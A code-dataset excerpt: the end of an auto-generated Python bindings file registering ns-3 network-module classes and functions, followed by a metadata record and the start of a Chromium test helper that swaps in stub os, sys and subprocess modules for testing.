## packetbb.h (module 'network'): void ns3::PbbTlv::SetTypeExt(uint8_t type) [member function]
cls.add_method('SetTypeExt',
'void',
[param('uint8_t', 'type')])
## packetbb.h (module 'network'): void ns3::PbbTlv::SetValue(ns3::Buffer start) [member function]
cls.add_method('SetValue',
'void',
[param('ns3::Buffer', 'start')])
## packetbb.h (module 'network'): void ns3::PbbTlv::SetValue(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('SetValue',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packetbb.h (module 'network'): uint8_t ns3::PbbTlv::GetIndexStart() const [member function]
cls.add_method('GetIndexStart',
'uint8_t',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): uint8_t ns3::PbbTlv::GetIndexStop() const [member function]
cls.add_method('GetIndexStop',
'uint8_t',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): bool ns3::PbbTlv::HasIndexStart() const [member function]
cls.add_method('HasIndexStart',
'bool',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): bool ns3::PbbTlv::HasIndexStop() const [member function]
cls.add_method('HasIndexStop',
'bool',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): bool ns3::PbbTlv::IsMultivalue() const [member function]
cls.add_method('IsMultivalue',
'bool',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): void ns3::PbbTlv::SetIndexStart(uint8_t index) [member function]
cls.add_method('SetIndexStart',
'void',
[param('uint8_t', 'index')],
visibility='protected')
## packetbb.h (module 'network'): void ns3::PbbTlv::SetIndexStop(uint8_t index) [member function]
cls.add_method('SetIndexStop',
'void',
[param('uint8_t', 'index')],
visibility='protected')
## packetbb.h (module 'network'): void ns3::PbbTlv::SetMultivalue(bool isMultivalue) [member function]
cls.add_method('SetMultivalue',
'void',
[param('bool', 'isMultivalue')],
visibility='protected')
return
def register_Ns3RandomVariableChecker_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::RandomVariableChecker::RandomVariableChecker() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariableChecker::RandomVariableChecker(ns3::RandomVariableChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomVariableChecker const &', 'arg0')])
return
def register_Ns3RandomVariableValue_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue(ns3::RandomVariableValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomVariableValue const &', 'arg0')])
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue(ns3::RandomVariable const & value) [constructor]
cls.add_constructor([param('ns3::RandomVariable const &', 'value')])
## random-variable.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::RandomVariableValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## random-variable.h (module 'core'): bool ns3::RandomVariableValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## random-variable.h (module 'core'): ns3::RandomVariable ns3::RandomVariableValue::Get() const [member function]
cls.add_method('Get',
'ns3::RandomVariable',
[],
is_const=True)
## random-variable.h (module 'core'): std::string ns3::RandomVariableValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## random-variable.h (module 'core'): void ns3::RandomVariableValue::Set(ns3::RandomVariable const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::RandomVariable const &', 'value')])
return
def register_Ns3RateErrorModel_methods(root_module, cls):
## error-model.h (module 'network'): ns3::RateErrorModel::RateErrorModel(ns3::RateErrorModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RateErrorModel const &', 'arg0')])
## error-model.h (module 'network'): ns3::RateErrorModel::RateErrorModel() [constructor]
cls.add_constructor([])
## error-model.h (module 'network'): double ns3::RateErrorModel::GetRate() const [member function]
cls.add_method('GetRate',
'double',
[],
is_const=True)
## error-model.h (module 'network'): static ns3::TypeId ns3::RateErrorModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## error-model.h (module 'network'): ns3::RateErrorModel::ErrorUnit ns3::RateErrorModel::GetUnit() const [member function]
cls.add_method('GetUnit',
'ns3::RateErrorModel::ErrorUnit',
[],
is_const=True)
## error-model.h (module 'network'): void ns3::RateErrorModel::SetRandomVariable(ns3::RandomVariable const & ranvar) [member function]
cls.add_method('SetRandomVariable',
'void',
[param('ns3::RandomVariable const &', 'ranvar')])
## error-model.h (module 'network'): void ns3::RateErrorModel::SetRate(double rate) [member function]
cls.add_method('SetRate',
'void',
[param('double', 'rate')])
## error-model.h (module 'network'): void ns3::RateErrorModel::SetUnit(ns3::RateErrorModel::ErrorUnit error_unit) [member function]
cls.add_method('SetUnit',
'void',
[param('ns3::RateErrorModel::ErrorUnit', 'error_unit')])
## error-model.h (module 'network'): bool ns3::RateErrorModel::DoCorrupt(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): bool ns3::RateErrorModel::DoCorruptBit(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorruptBit',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): bool ns3::RateErrorModel::DoCorruptByte(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorruptByte',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): bool ns3::RateErrorModel::DoCorruptPkt(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorruptPkt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): void ns3::RateErrorModel::DoReset() [member function]
cls.add_method('DoReset',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3ReceiveListErrorModel_methods(root_module, cls):
## error-model.h (module 'network'): ns3::ReceiveListErrorModel::ReceiveListErrorModel(ns3::ReceiveListErrorModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ReceiveListErrorModel const &', 'arg0')])
## error-model.h (module 'network'): ns3::ReceiveListErrorModel::ReceiveListErrorModel() [constructor]
cls.add_constructor([])
## error-model.h (module 'network'): std::list<unsigned int, std::allocator<unsigned int> > ns3::ReceiveListErrorModel::GetList() const [member function]
cls.add_method('GetList',
'std::list< unsigned int >',
[],
is_const=True)
## error-model.h (module 'network'): static ns3::TypeId ns3::ReceiveListErrorModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## error-model.h (module 'network'): void ns3::ReceiveListErrorModel::SetList(std::list<unsigned int, std::allocator<unsigned int> > const & packetlist) [member function]
cls.add_method('SetList',
'void',
[param('std::list< unsigned int > const &', 'packetlist')])
## error-model.h (module 'network'): bool ns3::ReceiveListErrorModel::DoCorrupt(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): void ns3::ReceiveListErrorModel::DoReset() [member function]
cls.add_method('DoReset',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3SimpleChannel_methods(root_module, cls):
## simple-channel.h (module 'network'): ns3::SimpleChannel::SimpleChannel(ns3::SimpleChannel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SimpleChannel const &', 'arg0')])
## simple-channel.h (module 'network'): ns3::SimpleChannel::SimpleChannel() [constructor]
cls.add_constructor([])
## simple-channel.h (module 'network'): void ns3::SimpleChannel::Add(ns3::Ptr<ns3::SimpleNetDevice> device) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::SimpleNetDevice >', 'device')])
## simple-channel.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::SimpleChannel::GetDevice(uint32_t i) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## simple-channel.h (module 'network'): uint32_t ns3::SimpleChannel::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True, is_virtual=True)
## simple-channel.h (module 'network'): static ns3::TypeId ns3::SimpleChannel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## simple-channel.h (module 'network'): void ns3::SimpleChannel::Send(ns3::Ptr<ns3::Packet> p, uint16_t protocol, ns3::Mac48Address to, ns3::Mac48Address from, ns3::Ptr<ns3::SimpleNetDevice> sender) [member function]
cls.add_method('Send',
'void',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint16_t', 'protocol'), param('ns3::Mac48Address', 'to'), param('ns3::Mac48Address', 'from'), param('ns3::Ptr< ns3::SimpleNetDevice >', 'sender')])
return
def register_Ns3SimpleNetDevice_methods(root_module, cls):
## simple-net-device.h (module 'network'): ns3::SimpleNetDevice::SimpleNetDevice(ns3::SimpleNetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SimpleNetDevice const &', 'arg0')])
## simple-net-device.h (module 'network'): ns3::SimpleNetDevice::SimpleNetDevice() [constructor]
cls.add_constructor([])
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::AddLinkChangeCallback(ns3::Callback<void,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Address ns3::SimpleNetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Address ns3::SimpleNetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::SimpleNetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): uint32_t ns3::SimpleNetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): uint16_t ns3::SimpleNetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Address ns3::SimpleNetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Address ns3::SimpleNetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::SimpleNetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): static ns3::TypeId ns3::SimpleNetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::Receive(ns3::Ptr<ns3::Packet> packet, uint16_t protocol, ns3::Mac48Address to, ns3::Mac48Address from) [member function]
cls.add_method('Receive',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('uint16_t', 'protocol'), param('ns3::Mac48Address', 'to'), param('ns3::Mac48Address', 'from')])
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'address')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetChannel(ns3::Ptr<ns3::SimpleChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::SimpleChannel >', 'channel')])
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetPromiscReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetReceiveErrorModel(ns3::Ptr<ns3::ErrorModel> em) [member function]
cls.add_method('SetReceiveErrorModel',
'void',
[param('ns3::Ptr< ns3::ErrorModel >', 'em')])
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3TimeChecker_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker(ns3::TimeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeChecker const &', 'arg0')])
return
def register_Ns3TimeValue_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
cls.add_constructor([param('ns3::Time const &', 'value')])
## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
cls.add_method('Get',
'ns3::Time',
[],
is_const=True)
## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Time const &', 'value')])
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3AddressChecker_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')])
return
def register_Ns3AddressValue_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressValue const &', 'arg0')])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor]
cls.add_constructor([param('ns3::Address const &', 'value')])
## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Address',
[],
is_const=True)
## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Address const &', 'value')])
return
def register_Ns3PbbAddressTlv_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbAddressTlv::PbbAddressTlv() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::PbbAddressTlv::PbbAddressTlv(ns3::PbbAddressTlv const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbAddressTlv const &', 'arg0')])
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressTlv::GetIndexStart() const [member function]
cls.add_method('GetIndexStart',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressTlv::GetIndexStop() const [member function]
cls.add_method('GetIndexStop',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbAddressTlv::HasIndexStart() const [member function]
cls.add_method('HasIndexStart',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbAddressTlv::HasIndexStop() const [member function]
cls.add_method('HasIndexStop',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbAddressTlv::IsMultivalue() const [member function]
cls.add_method('IsMultivalue',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressTlv::SetIndexStart(uint8_t index) [member function]
cls.add_method('SetIndexStart',
'void',
[param('uint8_t', 'index')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlv::SetIndexStop(uint8_t index) [member function]
cls.add_method('SetIndexStop',
'void',
[param('uint8_t', 'index')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlv::SetMultivalue(bool isMultivalue) [member function]
cls.add_method('SetMultivalue',
'void',
[param('bool', 'isMultivalue')])
return
def register_functions(root_module):
module = root_module
## address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeAddressChecker() [free function]
module.add_function('MakeAddressChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## data-rate.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeDataRateChecker() [free function]
module.add_function('MakeDataRateChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## ipv4-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeIpv4AddressChecker() [free function]
module.add_function('MakeIpv4AddressChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## ipv4-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeIpv4MaskChecker() [free function]
module.add_function('MakeIpv4MaskChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## ipv6-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeIpv6AddressChecker() [free function]
module.add_function('MakeIpv6AddressChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## ipv6-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeIpv6PrefixChecker() [free function]
module.add_function('MakeIpv6PrefixChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## mac48-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeMac48AddressChecker() [free function]
module.add_function('MakeMac48AddressChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## address-utils.h (module 'network'): extern void ns3::ReadFrom(ns3::Buffer::Iterator & i, ns3::Address & ad, uint32_t len) [free function]
module.add_function('ReadFrom',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Address &', 'ad'), param('uint32_t', 'len')])
## address-utils.h (module 'network'): extern void ns3::ReadFrom(ns3::Buffer::Iterator & i, ns3::Ipv4Address & ad) [free function]
module.add_function('ReadFrom',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Ipv4Address &', 'ad')])
## address-utils.h (module 'network'): extern void ns3::ReadFrom(ns3::Buffer::Iterator & i, ns3::Ipv6Address & ad) [free function]
module.add_function('ReadFrom',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Ipv6Address &', 'ad')])
## address-utils.h (module 'network'): extern void ns3::ReadFrom(ns3::Buffer::Iterator & i, ns3::Mac48Address & ad) [free function]
module.add_function('ReadFrom',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Mac48Address &', 'ad')])
## address-utils.h (module 'network'): extern void ns3::WriteTo(ns3::Buffer::Iterator & i, ns3::Address const & ad) [free function]
module.add_function('WriteTo',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Address const &', 'ad')])
## address-utils.h (module 'network'): extern void ns3::WriteTo(ns3::Buffer::Iterator & i, ns3::Ipv4Address ad) [free function]
module.add_function('WriteTo',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Ipv4Address', 'ad')])
## address-utils.h (module 'network'): extern void ns3::WriteTo(ns3::Buffer::Iterator & i, ns3::Ipv6Address ad) [free function]
module.add_function('WriteTo',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Ipv6Address', 'ad')])
## address-utils.h (module 'network'): extern void ns3::WriteTo(ns3::Buffer::Iterator & i, ns3::Mac48Address ad) [free function]
module.add_function('WriteTo',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Mac48Address', 'ad')])
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
register_functions_ns3_addressUtils(module.get_submodule('addressUtils'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def register_functions_ns3_addressUtils(module, root_module):
## address-utils.h (module 'network'): extern bool ns3::addressUtils::IsMulticast(ns3::Address const & ad) [free function]
module.add_function('IsMulticast',
'bool',
[param('ns3::Address const &', 'ad')])
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
|
dtaht/ns-3-dev-old
|
src/network/bindings/modulegen__gcc_LP64.py
|
Python
|
gpl-2.0
| 507,731 | 0.015106 |
# Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides stubs for os, sys and subprocess for testing
This test allows one to test code that itself uses os, sys, and subprocess.
"""
import ntpath
import os
import posixpath
import re
import shlex
import sys
class Override(object):
def __init__(self, base_module, module_list):
stubs = {'cloud_storage': CloudStorageModuleStub,
'open': OpenFunctionStub,
'os': OsModuleStub,
'perf_control': PerfControlModuleStub,
'raw_input': RawInputFunctionStub,
'subprocess': SubprocessModuleStub,
'sys': SysModuleStub,
'thermal_throttle': ThermalThrottleModuleStub,
'logging': LoggingStub,
'certutils': CertUtilsStub,
'adb_install_cert': AdbInstallCertStub,
'platformsettings': PlatformSettingsStub,
}
self.adb_commands = None
self.os = None
self.subprocess = None
self.sys = None
self._base_module = base_module
self._overrides = {}
for module_name in module_list:
self._overrides[module_name] = getattr(base_module, module_name, None)
setattr(self, module_name, stubs[module_name]())
setattr(base_module, module_name, getattr(self, module_name))
if self.os and self.sys:
self.os.path.sys = self.sys
def __del__(self):
assert not len(self._overrides)
def Restore(self):
for module_name, original_module in self._overrides.iteritems():
if original_module is None:
# This will happen when we override built-in functions, like open.
# If we don't delete the attribute, we will shadow the built-in
# function with an attribute set to None.
delattr(self._base_module, module_name)
else:
setattr(self._base_module, module_name, original_module)
